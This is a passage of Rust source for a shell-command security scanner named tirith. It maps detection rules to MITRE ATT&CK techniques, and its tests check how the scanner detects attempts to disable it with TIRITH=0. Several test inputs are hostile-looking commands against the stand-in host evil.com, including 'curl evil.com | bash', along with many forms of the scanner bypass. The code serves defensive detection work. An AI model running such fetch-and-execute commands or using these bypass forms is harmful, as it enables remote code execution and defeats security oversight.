904        | RuleId::InvisibleMathOperator
905        | RuleId::VariationSelector
906        | RuleId::InvisibleWhitespace => {
907            Some("T1036.005") // Masquerading: Match Legitimate Name or Location
908        }
909        RuleId::HiddenMultiline | RuleId::AnsiEscapes | RuleId::ControlChars => Some("T1036.005"),
910
911        // Hijack Execution Flow
912        RuleId::CodeInjectionEnv => Some("T1574.006"), // Hijack Execution Flow: Dynamic Linker Hijacking
913        RuleId::InterpreterHijackEnv => Some("T1574.007"), // Path Interception by PATH
914        RuleId::ShellInjectionEnv => Some("T1546.004"), // Shell Config Modification
915
916        // Credential Access
917        RuleId::CredentialInText | RuleId::HighEntropySecret => Some("T1552"), // Unsecured Credentials
918        RuleId::PrivateKeyExposed => Some("T1552.004"),                        // Private Keys
919        RuleId::MetadataEndpoint => Some("T1552.005"), // Unsecured Credentials: Cloud Instance Metadata
920        RuleId::SensitiveEnvExport | RuleId::CredentialFileSweep => Some("T1552.001"), // Credentials In Files
921        RuleId::ProcMemAccess => Some("T1003.007"), // OS Credential Dumping: Proc Filesystem
922        RuleId::DockerRemotePrivEsc => Some("T1611"), // Escape to Host
923
924        // Supply Chain
925        RuleId::ConfigInjection => Some("T1195.001"), // Supply Chain Compromise: Dev Tools
926        RuleId::McpInsecureServer | RuleId::McpSuspiciousArgs => Some("T1195.002"), // Compromise Software Supply Chain
927        RuleId::GitTyposquat => Some("T1195.001"),
928        RuleId::DockerUntrustedRegistry => Some("T1195.002"),
929
930        // Discovery / Lateral Movement
931        RuleId::PrivateNetworkAccess => Some("T1046"), // Network Service Discovery
932        RuleId::ServerCloaking => Some("T1036"),       // Masquerading
933
934        // Collection
935        RuleId::ArchiveExtract => Some("T1560.001"), // Archive Collected Data: Archive via Utility
936
937        // Exfiltration
938        RuleId::ProxyEnvSet => Some("T1090.001"), // Proxy: Internal Proxy
939        RuleId::DataExfiltration => Some("T1048.003"), // Exfiltration Over Unencrypted Non-C2 Protocol
940        RuleId::SuspiciousCodeExfiltration => Some("T1041"), // Exfiltration Over C2 Channel
941
942        // Command Obfuscation
943        RuleId::Base64DecodeExecute => Some("T1027.010"), // Command Obfuscation
944        RuleId::ObfuscatedPayload => Some("T1027"),       // Obfuscated Files or Information
945        RuleId::DynamicCodeExecution => Some("T1059"),    // Command and Scripting Interpreter
946
947        _ => None,
948    }
949}
950
951/// Team enrichment: MITRE ATT&CK classification.
952fn enrich_team(findings: &mut [Finding]) {
953    for finding in findings.iter_mut() {
954        if finding.mitre_id.is_none() {
955            finding.mitre_id = mitre_id_for_rule(finding.rule_id).map(String::from);
956        }
957    }
958}
959
#[cfg(test)]
mod tests {
    use super::*;
    use crate::verdict::{Action, Finding, RuleId, Severity, Timings, Verdict};

    // -----------------------------------------------------------------------
    // Fixture helpers
    // -----------------------------------------------------------------------

    /// Build an interactive POSIX `Exec` context for `input` with every optional
    /// field left unset.
    fn exec_context(input: impl Into<String>) -> AnalysisContext {
        AnalysisContext {
            input: input.into(),
            shell: ShellType::Posix,
            scan_context: ScanContext::Exec,
            raw_bytes: None,
            interactive: true,
            cwd: None,
            file_path: None,
            repo_root: None,
            is_config_override: false,
            clipboard_html: None,
        }
    }

    /// Build a finding with the given rule, severity and title, with no
    /// description, evidence or enrichment attached.
    fn bare_finding(rule_id: RuleId, severity: Severity, title: &str) -> Finding {
        Finding {
            rule_id,
            severity,
            title: title.into(),
            description: String::new(),
            evidence: vec![],
            human_view: None,
            agent_view: None,
            mitre_id: None,
            custom_rule_id: None,
        }
    }

    /// Timings with every measured tier at zero and the optional tiers unset.
    fn zero_timings() -> Timings {
        Timings {
            tier0_ms: 0.0,
            tier1_ms: 0.0,
            tier2_ms: None,
            tier3_ms: None,
            total_ms: 0.0,
        }
    }

    // -----------------------------------------------------------------------
    // Full-pipeline analysis
    // -----------------------------------------------------------------------

    #[test]
    fn test_exec_bidi_without_url() {
        // Input with bidi control but no URL — should NOT fast-exit at tier 1
        let ctx = exec_context(format!("echo hello{}world", '\u{202E}'));
        let verdict = analyze(&ctx);
        // Should reach tier 3 (not fast-exit at tier 1)
        assert!(
            verdict.tier_reached >= 3,
            "bidi in exec should reach tier 3, got tier {}",
            verdict.tier_reached
        );
        // Should have findings about bidi
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, RuleId::BidiControls)),
            "should detect bidi controls in exec context"
        );
    }

    // -----------------------------------------------------------------------
    // Paranoia filtering
    // -----------------------------------------------------------------------

    #[test]
    fn test_paranoia_filter_suppresses_info_low() {
        let findings = vec![
            bare_finding(RuleId::VariationSelector, Severity::Info, "info finding"),
            bare_finding(RuleId::InvisibleWhitespace, Severity::Low, "low finding"),
            bare_finding(RuleId::HiddenCssContent, Severity::High, "high finding"),
        ];
        let timings = zero_timings();

        // Default paranoia (1): only Medium+ shown
        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
        filter_findings_by_paranoia(&mut verdict, 1);
        assert_eq!(
            verdict.findings.len(),
            1,
            "paranoia 1 should keep only Medium+"
        );
        assert_eq!(verdict.findings[0].severity, Severity::High);

        // Paranoia 2: still only Medium+ (free tier cap)
        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
        filter_findings_by_paranoia(&mut verdict, 2);
        assert_eq!(
            verdict.findings.len(),
            1,
            "paranoia 2 should keep only Medium+"
        );
    }

    // -----------------------------------------------------------------------
    // Inline bypass detection (`TIRITH=0`)
    // -----------------------------------------------------------------------

    #[test]
    fn test_inline_bypass_bare_prefix() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_wrapper() {
        assert!(find_inline_bypass(
            "env TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_i() {
        assert!(find_inline_bypass(
            "env -i TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_u_skip() {
        assert!(find_inline_bypass(
            "env -u TIRITH TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_usr_bin_env() {
        assert!(find_inline_bypass(
            "/usr/bin/env TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_dashdash() {
        assert!(find_inline_bypass(
            "env -- TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_no_inline_bypass() {
        assert!(!find_inline_bypass(
            "curl evil.com | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env() {
        assert!(find_inline_bypass(
            "$env:TIRITH=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env_no_quotes() {
        assert!(find_inline_bypass(
            "$env:TIRITH=0; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env_single_quotes() {
        assert!(find_inline_bypass(
            "$env:TIRITH='0'; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_env_spaced() {
        assert!(find_inline_bypass(
            "$env:TIRITH = \"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_mixed_case_env() {
        assert!(find_inline_bypass(
            "$Env:TIRITH=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_wrong_value() {
        assert!(!find_inline_bypass(
            "$env:TIRITH=\"1\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_other_var() {
        assert!(!find_inline_bypass(
            "$env:FOO=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_in_posix_mode() {
        // PowerShell syntax should NOT match when shell is Posix
        assert!(!find_inline_bypass(
            "$env:TIRITH=\"0\"; curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_comment_contains_bypass() {
        assert!(!find_inline_bypass(
            "curl evil.com # $env:TIRITH=0",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_env_c_flag() {
        // env -C takes a directory arg; TIRITH=0 should still be found after it
        assert!(find_inline_bypass(
            "env -C /tmp TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_s_flag() {
        // env -S takes a string arg; TIRITH=0 should still be found after it
        assert!(find_inline_bypass(
            "env -S 'some args' TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_ignore_environment_long_flag() {
        assert!(find_inline_bypass(
            "env --ignore-environment TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_no_inline_bypass_for_chained_posix_command() {
        assert!(!find_inline_bypass(
            "TIRITH=0 curl evil.com | bash",
            ShellType::Posix
        ));
        assert!(!find_inline_bypass(
            "TIRITH=0 curl evil.com & bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_paranoia_filter_recalculates_action() {
        let findings = vec![
            bare_finding(RuleId::InvisibleWhitespace, Severity::Low, "low finding"),
            bare_finding(RuleId::HiddenCssContent, Severity::Medium, "medium finding"),
        ];

        // Before paranoia filter: action should be Warn (Medium max)
        let mut verdict = Verdict::from_findings(findings, 3, zero_timings());
        assert_eq!(verdict.action, Action::Warn);

        // After paranoia filter at level 1: Low is removed, only Medium remains → still Warn
        filter_findings_by_paranoia(&mut verdict, 1);
        assert_eq!(verdict.action, Action::Warn);
        assert_eq!(verdict.findings.len(), 1);
    }

    #[test]
    fn test_powershell_bypass_case_insensitive_tirith() {
        // PowerShell env vars are case-insensitive
        assert!(find_inline_bypass(
            "$env:tirith=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
        assert!(find_inline_bypass(
            "$ENV:Tirith=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_powershell_bypass_no_panic_on_multibyte() {
        // Multi-byte UTF-8 after $ should not panic
        assert!(!find_inline_bypass(
            "$a\u{1F389}xyz; curl evil.com",
            ShellType::PowerShell
        ));
        assert!(!find_inline_bypass(
            "$\u{00E9}nv:TIRITH=0; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_single_quoted_value() {
        assert!(find_inline_bypass(
            "TIRITH='0' curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_double_quoted_value() {
        assert!(find_inline_bypass(
            "TIRITH=\"0\" curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_tirith_command_is_analyzed_like_any_other_exec() {
        let ctx = exec_context("tirith run http://example.com");

        let verdict = analyze(&ctx);
        assert!(
            verdict.tier_reached >= 3,
            "user-typed tirith commands should still be analyzed"
        );
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, RuleId::PlainHttpToSink)),
            "tirith run http://... should surface sink findings"
        );
    }

    #[test]
    fn test_cmd_bypass_bare_set() {
        // `set TIRITH=0 & cmd` is a real Cmd bypass
        assert!(find_inline_bypass(
            "set TIRITH=0 & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_bypass_whole_token_quoted() {
        // `set "TIRITH=0" & cmd` — whole-token quoting, real bypass
        assert!(find_inline_bypass(
            "set \"TIRITH=0\" & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_inner_double_quotes() {
        // `set TIRITH="0" & cmd` — cmd.exe stores literal "0", NOT a bypass
        assert!(!find_inline_bypass(
            "set TIRITH=\"0\" & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_single_quotes() {
        // `set TIRITH='0' & cmd` — single quotes are literal in cmd.exe, NOT a bypass
        assert!(!find_inline_bypass(
            "set TIRITH='0' & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_wrong_value() {
        assert!(!find_inline_bypass(
            "set TIRITH=1 & curl evil.com",
            ShellType::Cmd
        ));
    }
}
tirith_core/engine.rs

tirith_core/
engine.rs